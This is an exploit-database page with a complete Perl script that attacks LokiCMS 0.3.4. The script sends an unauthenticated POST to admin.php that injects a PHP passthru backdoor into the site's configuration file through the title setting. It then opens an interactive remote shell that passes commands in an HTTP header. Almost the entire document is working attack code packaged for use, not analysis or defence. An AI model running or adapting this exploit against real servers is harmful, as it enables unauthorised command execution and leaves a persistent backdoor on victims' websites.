[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : LokiCMS 0.3.4 writeconfig() Remote Command Execution Exploit
# Published : 2008-10-13
# Author : girex
# Previous Title : PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit
# Next Title : LokiCMS 0.3.4 (admin.php) Create Local File Inclusion Exploit
# Author: __GiReX__
# Homepage: http://girex.altervista.org
# CMS: LokiCMS 0.3.4
# URL: http://www.lokicms.com/
# Description: LokiCMS is still vulnerable to Remote Command Execution (see: http://milw0rm.com/exploits/5408)
# The exploit changed becouse the vars changed but the bugged function is the same: writeconfig()
# LokiCMS does not check the access to admin.php via POST...
#!/usr/bin/perl -w
# LokiCMS <= 0.3.4 Remote Command Execution Exploit
# Needs with magic_quotes_gpc = Off
# Coded by __GiReX__
use LWP::UserAgent;
if(not defined $ARGV[0])
{
banner();
print "[-] Usage: perl $0 [host] [path]n";
print "[-] Example: perl $0 localhost /lokicms/nn";
exit;
}
my $lwp = new LWP::UserAgent or die;
my $target = $ARGV[0] =~ /^http:/// ? $ARGV[0]: 'http://' . $ARGV[0];
$target .= $ARGV[1] unless not defined $ARGV[1];
$target .= '/' unless $target =~ /^http://(.?)/$/;
banner();
my $res = $lwp->post($target.'admin.php',
[ 'LokiACTION' => 'A_SAVE_G_SETTINGS',
'title' => "';echo "<!-- INFECTED -->";if(strlen($_SERVER['HTTP_CMD']))".
"passthru($_SERVER['HTTP_CMD']);//",
'language' => 'english-utf-8',
'theme' => 'default' ]);
if($res->is_error)
{
print "[-] Request mistake. Exploit terminated!n";
exit ();
}
while(1)
{
print "[+] shell:~$ ";
chomp($cmd = <STDIN>);
last if $cmd eq 'exit';
$lwp->default_header( 'CMD' => $cmd );
my $res = $lwp->get($target.'includes/Config.php');
if($res->is_success and $res->content =~ /INFECTED/)
{
print "n". substr($res->content, index($res->content, 'INFECTED') + 12)."n";
}
else
{
print "[-] PHP Code not injected. maybe magic_quotes_gpc = On!n";
last;
}
}
sub banner
{
print "[+] LokiCMS 0.3.4 Remote Command Execution Exploitn";
print "[+] Coded by __GiReX__n";
print "n";
}
# www.Syue.com [2008-10-13]